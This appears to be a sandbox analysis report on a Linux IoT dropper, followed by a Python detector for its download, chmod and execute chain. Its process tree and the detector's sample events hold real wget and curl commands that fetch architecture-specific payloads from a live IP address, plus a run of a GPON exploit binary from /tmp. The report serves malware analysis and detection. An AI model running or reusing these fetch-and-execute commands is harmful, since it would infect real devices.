Analysis

  • max time kernel
    80s
  • max time network
    128s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240729-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240729-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    28-07-2024 16:40

General

  • Target

    17f41b4b65e5ddad4a76594560d43927_JaffaCakes118

  • Size

    3KB

  • MD5

    17f41b4b65e5ddad4a76594560d43927

  • SHA1

    bb7691396c850ff2b4645b90336852650aa26eb6

  • SHA256

    36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588

  • SHA512

    602d2b3fda5948c263ab2c48f96993daf5ef404faec82cb2e7f55eae7c8dbed3525b6715f537629d7299c3f4e43077bcf1429b81375e7b2e16f398768920b322

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 13 IoCs
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
    /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
    1⤵
    • Writes file to tmp directory
    PID:1502
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
      2⤵
      PID:1503
    • /usr/bin/curl
      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
      2⤵
      PID:1507
    • /bin/cat
      cat m3th.x86
      2⤵
      PID:1508
    • /bin/chmod
      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT
      2⤵
      PID:1509
    • /tmp/g0away
      ./g0away gpon8080.exploit
      2⤵
      • Executes dropped EXE
      PID:1510
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
      2⤵
      PID:1512
    • /usr/bin/curl
      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
      2⤵
      PID:1513
    • /bin/cat
      cat m3th.mips
      2⤵
      PID:1514
    • /bin/chmod
      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT
      2⤵
      PID:1515
    • /tmp/g0away
      ./g0away gpon8080.exploit
      2⤵
      • Executes dropped EXE
      PID:1516
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
      2⤵
      PID:1518
    • /usr/bin/curl
      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
      2⤵
      PID:1519
    • /bin/cat
      cat m3th.mpsl
      2⤵
      PID:1520
    • /bin/chmod
      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT
      2⤵
      PID:1521
    • /tmp/g0away
      ./g0away gpon8080.exploit
      2⤵
      • Executes dropped EXE
      PID:1522
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
      2⤵
      PID:1524
    • /usr/bin/curl
      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
      2⤵
      PID:1525
    • /bin/cat
      cat m3th.arm
      2⤵
      PID:1526
    • /bin/chmod
      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT
      2⤵
      PID:1527
    • /tmp/g0away
      ./g0away gpon8080.exploit
      2⤵
      • Executes dropped EXE
      PID:1528
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
      2⤵
      PID:1530
    • /usr/bin/curl
      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
      2⤵
      PID:1531
    • /bin/cat
      cat m3th.arm5
      2⤵
      PID:1534
    • /bin/chmod
      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
      2⤵
      PID:1535
    • /tmp/g0away
      ./g0away gpon8080.exploit
      2⤵
      • Executes dropped EXE
      PID:1536
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
      2⤵
      PID:1538
    • /usr/bin/curl
      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
      2⤵
      PID:1539
    • /bin/cat
      cat m3th.arm6
      2⤵
      PID:1540
    • /bin/chmod
      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
      2⤵
      PID:1541
    • /tmp/g0away
      ./g0away gpon8080.exploit
      2⤵
      • Executes dropped EXE
      PID:1542
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
      2⤵
      PID:1544
    • /usr/bin/curl
      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
      2⤵
      PID:1545
    • /bin/cat
      cat m3th.arm7
      2⤵
      PID:1546
    • /bin/chmod
      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
      2⤵
      PID:1547
    • /tmp/g0away
      ./g0away gpon8080.exploit
      2⤵
      • Executes dropped EXE
      PID:1548
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
      2⤵
      PID:1550
    • /usr/bin/curl
      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
      2⤵
      PID:1551
    • /bin/cat
      cat m3th.ppc
      2⤵
      PID:1552
    • /bin/chmod
      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
      2⤵
      PID:1553
    • /tmp/g0away
      ./g0away gpon8080.exploit
      2⤵
      • Executes dropped EXE
      PID:1554
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
      2⤵
      PID:1556
    • /usr/bin/curl
      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
      2⤵
      PID:1557
    • /bin/cat
      cat m3th.m68k
      2⤵
      PID:1558
    • /bin/chmod
      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
      2⤵
      PID:1559
    • /tmp/g0away
      ./g0away gpon8080.exploit
      2⤵
      • Executes dropped EXE
      PID:1560
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
      2⤵
      PID:1562
    • /usr/bin/curl
      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
      2⤵
      PID:1563
    • /bin/cat
      cat m3th.spc
      2⤵
      PID:1564
    • /bin/chmod
      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
      2⤵
      PID:1565
    • /tmp/g0away
      ./g0away gpon8080.exploit
      2⤵
      • Executes dropped EXE
      PID:1566
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686
      2⤵
      PID:1568
    • /usr/bin/curl
      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686
      2⤵
      PID:1569
    • /bin/cat
      cat m3th.i686
      2⤵
      PID:1570
    • /bin/chmod
      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
      2⤵
      PID:1571
    • /tmp/g0away
      ./g0away gpon8080.exploit
      2⤵
      • Executes dropped EXE
      PID:1572
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4
      2⤵
      PID:1574
    • /usr/bin/curl
      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4
      2⤵
      PID:1575
    • /bin/cat
      cat m3th.sh4
      2⤵
      PID:1576
    • /bin/chmod
      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
      2⤵
      PID:1577
    • /tmp/g0away
      ./g0away gpon8080.exploit
      2⤵
      • Executes dropped EXE
      PID:1578
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc
      2⤵
      PID:1580
    • /usr/bin/curl
      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc
      2⤵
      PID:1581
    • /bin/cat
      cat m3th.arc
      2⤵
      PID:1582
    • /bin/chmod
      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
      2⤵
      PID:1583
    • /tmp/g0away
      ./g0away gpon8080.exploit
      2⤵
      • Executes dropped EXE
      PID:1584
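The process tree above is the dropper's entire procedure, repeated once per architecture: fetch the payload with wget and curl, cat it (the sandbox records argv only, so the redirect of that cat into g0away is an inference, not something the report states), chmod +x, then run ./g0away. The following is an added example and is not code from the sandbox vendor or from the sample: detection logic that walks process events of this shape, flags a parent whose children perform download, chmod +x and execute-from-/tmp in that order, and extracts the IOCs (download URLs, host, architecture suffixes, executed binaries). The event tuples are constructed from the report's tree with a benign download added to show the rule does not fire on it; the event field layout and the list of world-writable directories are assumptions.

```python
"""Detect a multi-architecture download -> chmod +x -> execute-from-/tmp
dropper chain in process events and pull out its IOCs.
Added example; not part of the sandbox report or of the sample."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed sample events modelled on the report's tree:
# (pid, parent pid, executable path, command line).  The wget under pid 1
# is a benign lone download that must not trigger the rule.
SAMPLE_EVENTS = [
    (1502, 1, "/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118",
     "/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118"),
    (1503, 1502, "/usr/bin/wget", "wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86"),
    (1507, 1502, "/usr/bin/curl", "curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86"),
    (1508, 1502, "/bin/cat", "cat m3th.x86"),
    (1509, 1502, "/bin/chmod", "chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away snap-private-tmp"),
    (1510, 1502, "/tmp/g0away", "./g0away gpon8080.exploit"),
    (1512, 1502, "/usr/bin/wget", "wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips"),
    (1513, 1502, "/usr/bin/curl", "curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips"),
    (1514, 1502, "/bin/cat", "cat m3th.mips"),
    (1515, 1502, "/bin/chmod", "chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away snap-private-tmp"),
    (1516, 1502, "/tmp/g0away", "./g0away gpon8080.exploit"),
    (1600, 1, "/usr/bin/wget", "wget https://example.org/index.html"),
]

URL_RE = re.compile(r"https?://[^\s'\"]+")
# Architecture suffixes used by the payload names in the report (m3th.x86, m3th.mpsl, ...).
ARCH_RE = re.compile(r"\.(x86|i686|mips|mpsl|arm[0-9]*|ppc|m68k|spc|sh4|arc)$")
DOWNLOADERS = {"wget", "curl"}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")   # assumption: dirs worth flagging


@dataclass
class DropperFinding:
    parent_pid: int
    parent_image: str
    download_urls: list = field(default_factory=list)
    c2_hosts: set = field(default_factory=set)
    arch_suffixes: set = field(default_factory=set)
    executed: list = field(default_factory=list)   # (pid, cmdline) of dropped binaries run


def analyse(events):
    """Group children by parent pid; report a parent whose children download a
    URL, then mark something executable, then run a binary from a writable dir."""
    image = {pid: path for pid, _, path, _ in events}
    children = defaultdict(list)
    for pid, ppid, path, cmd in events:
        children[ppid].append((pid, path, cmd))

    findings = []
    for ppid, kids in children.items():
        finding = DropperFinding(ppid, image.get(ppid, "?"))
        chmod_seen = False
        for pid, path, cmd in sorted(kids):          # pid order == spawn order here
            prog = path.rsplit("/", 1)[-1]
            if prog in DOWNLOADERS:
                for url in URL_RE.findall(cmd):
                    if url not in finding.download_urls:   # wget and curl fetch the same URL
                        finding.download_urls.append(url)
                    parts = urlsplit(url)
                    finding.c2_hosts.add(parts.hostname)
                    m = ARCH_RE.search(parts.path)
                    if m:
                        finding.arch_suffixes.add(m.group(1))
            elif prog == "chmod" and "+x" in cmd.split():
                chmod_seen = True
            elif chmod_seen and path.startswith(WRITABLE_DIRS):
                finding.executed.append((pid, cmd))
        if finding.download_urls and chmod_seen and finding.executed:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"dropper pid={f.parent_pid} image={f.parent_image}")
        print("  hosts:", sorted(f.c2_hosts))
        print("  archs:", sorted(f.arch_suffixes))
        for pid, cmd in f.executed:
            print(f"  executed pid={pid}: {cmd}")
```

Requiring all three stages under one parent, in order, is what keeps a lone wget or an ordinary chmod from alerting; the architecture-suffix set is a useful pivot because a single host serving a dozen builds of the same name is characteristic of this family of IoT droppers.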
